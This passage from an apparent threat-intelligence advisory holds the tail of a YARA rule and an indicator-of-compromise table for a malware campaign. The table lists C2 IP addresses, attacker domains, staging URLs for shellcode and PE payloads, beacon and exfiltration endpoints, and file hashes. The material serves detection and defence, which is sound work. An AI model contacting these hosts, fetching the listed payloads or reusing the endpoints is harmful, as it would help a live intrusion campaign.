        reference   = "SL-ADV-2026-WP-001-V9"
    strings:
        $iconnode = "process.iconnode.com/google-ads/" ascii
        $verif    = "p.ksrndkehqnwntyxlhgto.com/verification/" ascii
        $flag1    = "phbqslixugkynefhnzol" ascii
        $flag2    = "yrejzpicqjfxoquxuuaw" ascii
        $wc_id    = "wc_profile_id" ascii
    condition:
        ($iconnode or $verif) and ($flag1 or $flag2) and $wc_id
}
IOC Quick Reference
Type | Value | Context
IP | 178.16.53.137 | dntds.shop: EtherHiding /teamrepo C2 (AS202412, SC)
IP | 91.92.240.121 | PS C2 / stage-3 loader (Spamhaus DROP 14+31 · AS202412)
IP | 91.92.243.161 | RAT C2 :3038, MSIL/Generic (Spamhaus DROP 14 · AS202412)
IP | 158.94.208.104 | Staging: student_*.bin payloads (AS202412 · unchanged V8+V9)
Domain | process.iconnode.com (NEW V9) | Silent C2 beacon · AWS aged domain (reg. 2014) · /google-ads/
Domain | ksrndkehqnwntyxlhgto.com | Attacker CDN (AWS): s. hijacked JS · p. exfil/beacon endpoints
Domain | dntds.shop | EtherHiding C2 (AS202412 · /teamrepo V9 · /jsrepo V7b)
URL | …/x7GkP2mQ9zL4/student_l.bin | Donut shellcode 53 KB · first bytes e8 c0 6d 00 (CALL, no MZ)
URL | …/x7GkP2mQ9zL4/student_s.bin | MZER PE 309 KB · magic 4d 5a 45 52
URL | dntds.shop/teamrepo?rnd= | EtherHiding payload endpoint · ?rnd= float cache-busting
SHA256 | F833D774…C99244 | zgxr4teh.0.cs: V9 C# P/Invoke stub · memory-confirmed out uint tid (identical to V8)
SHA256 | FFE7EEEF…D21A56 | ps_loader_stage2.ps1: 1,610-byte PS loader · recovered from PCAP + memory dump
SHA256 | 6D02D3AB…F4AD2 | zgxr4teh.dll mem-carved: PE32 x86 post-relocation · dump-6a29c211 offset 0x00953fc0
SHA256 | 86C9D146…724E9 | 137116.js: hijacked WC beacon (57,362 bytes)
SHA256 | 0F34DB24…6449 | f_0002a6: Brotli lure page cache (williamhale.co.uk)